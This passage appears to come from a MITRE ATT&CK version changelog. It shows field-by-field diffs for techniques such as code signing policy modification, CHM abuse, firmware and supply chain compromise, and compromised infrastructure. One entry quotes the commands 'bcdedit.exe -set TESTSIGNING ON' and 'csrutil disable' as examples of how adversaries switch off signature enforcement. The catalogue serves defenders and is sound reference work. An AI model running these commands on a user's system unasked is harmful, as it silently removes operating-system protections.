[Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. |
| x_mitre_data_sources[0] | Logon Session: Logon Session Creation | Application Log: Application Log Content |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Logon Session: Logon Session Creation |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. | Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-10 19:51:01.601000+00:00 | 2022-09-22 19:13:52.548000+00:00 |
| description | Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. | Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. |
| external_references[1]['source_name'] | Wikipedia Code Signing | EclecticLightChecksonEXECodeSigning |
| external_references[1]['description'] | Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016. | Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Code_signing | https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/ |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wikipedia Code Signing', 'description': 'Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.', 'url': 'https://en.wikipedia.org/wiki/Code_signing'} |
| Description |
|---|
Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 15:41:39.155000+00:00 | 2022-05-05 05:00:03.480000+00:00 |
| external_references[1]['source_name'] | Microsoft DSE June 2017 | Apple Disable SIP |
| external_references[1]['description'] | Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021. | Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN | https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection |
| external_references[2]['source_name'] | Apple Disable SIP | F-Secure BlackEnergy 2014 |
| external_references[2]['description'] | Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021. | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. |
| external_references[2]['url'] | https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf |
| external_references[3]['source_name'] | Microsoft Unsigned Driver Apr 2017 | FireEye HIKIT Rootkit Part 2 |
| external_references[3]['description'] | Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021. | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html |
| external_references[4]['source_name'] | Microsoft TESTSIGNING Feb 2021 | Microsoft Unsigned Driver Apr 2017 |
| external_references[4]['description'] | Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021. | Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test |
| external_references[5]['source_name'] | FireEye HIKIT Rootkit Part 2 | Microsoft DSE June 2017 |
| external_references[5]['description'] | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. | Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html | https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN |
| external_references[6]['source_name'] | GitHub Turla Driver Loader | Microsoft TESTSIGNING Feb 2021 |
| external_references[6]['description'] | TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021. | Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021. |
| external_references[6]['url'] | https://github.com/hfiref0x/TDL | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option |
| external_references[7]['source_name'] | F-Secure BlackEnergy 2014 | Unit42 AcidBox June 2020 |
| external_references[7]['description'] | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. |
| external_references[7]['url'] | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ |
| external_references[8]['source_name'] | Unit42 AcidBox June 2020 | GitHub Turla Driver Loader |
| external_references[8]['description'] | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. | TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021. |
| external_references[8]['url'] | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ | https://github.com/hfiref0x/TDL |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_defense_bypassed | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_defense_bypassed | Application control |
| Description |
|---|
| Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 21:03:21.700000+00:00 | 2022-04-19 18:31:48.827000+00:00 |
| external_references[1]['source_name'] | Powershell Remote Commands | Remote Shell Execution in Python |
| external_references[1]['description'] | Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021. | Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1 | https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python |
| external_references[3]['source_name'] | Remote Shell Execution in Python | Powershell Remote Commands |
| external_references[3]['description'] | Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021. | Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021. |
| external_references[3]['url'] | https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python | https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1 |
| x_mitre_version | 2.2 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Metadata | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
| Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program) A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:32:24.589000+00:00 | 2022-03-11 18:59:36.836000+00:00 |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-23 23:48:33.904000+00:00 | 2022-04-01 20:43:55.632000+00:00 |
| x_mitre_detection | Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. | Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. Disk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Driver: Driver Metadata | |
| x_mitre_platforms | Linux | |
| x_mitre_platforms | macOS |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Driver: Driver Metadata |
| Description |
|---|
| Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Sensor Health: Host Status'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-23 12:51:45.475000+00:00 | 2022-04-28 16:05:10.755000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jeremy Galloway'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:01:48.871000+00:00 | 2022-07-26 23:33:26.352000+00:00 |
| description | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) |
| external_references[1]['source_name'] | Mandiant APT1 | FireEye DNS Hijack 2019 |
| external_references[1]['description'] | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. |
| external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html |
| external_references[3]['source_name'] | Talos DNSpionage Nov 2018 | Koczwara Beacon Hunting Sep 2021 |
| external_references[3]['description'] | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. |
| external_references[3]['url'] | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 |
| external_references[4]['source_name'] | FireEye EPS Awakens Part 2 | Mandiant APT1 |
| external_references[4]['description'] | Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf |
| external_references[5]['source_name'] | NSA NCSC Turla OilRig | Talos DNSpionage Nov 2018 |
| external_references[5]['description'] | NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020. | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. |
| external_references[5]['url'] | https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html |
| external_references[6]['source_name'] | ThreatConnect Infrastructure Dec 2020 | NSA NCSC Turla OilRig |
| external_references[6]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020. |
| external_references[6]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf |
| external_references[8]['source_name'] | Koczwara Beacon Hunting Sep 2021 | ThreatConnect Infrastructure Dec 2020 |
| external_references[8]['description'] | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. |
| external_references[8]['url'] | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 | https://threatconnect.com/blog/infrastructure-research-hunting/ |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'FireEye EPS Awakens Part 2', 'description': 'Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.', 'url': 'https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html'} | |
| x_mitre_data_sources | Domain Name: Active DNS |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Domain Name: Active DNS |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['File: File Metadata'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-11 14:13:42.916000+00:00 | 2022-04-28 16:03:59.172000+00:00 |
| description | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['File: File Metadata'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-11 14:17:21.153000+00:00 | 2022-04-28 16:04:36.636000+00:00 |
| description | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) | Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version. Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
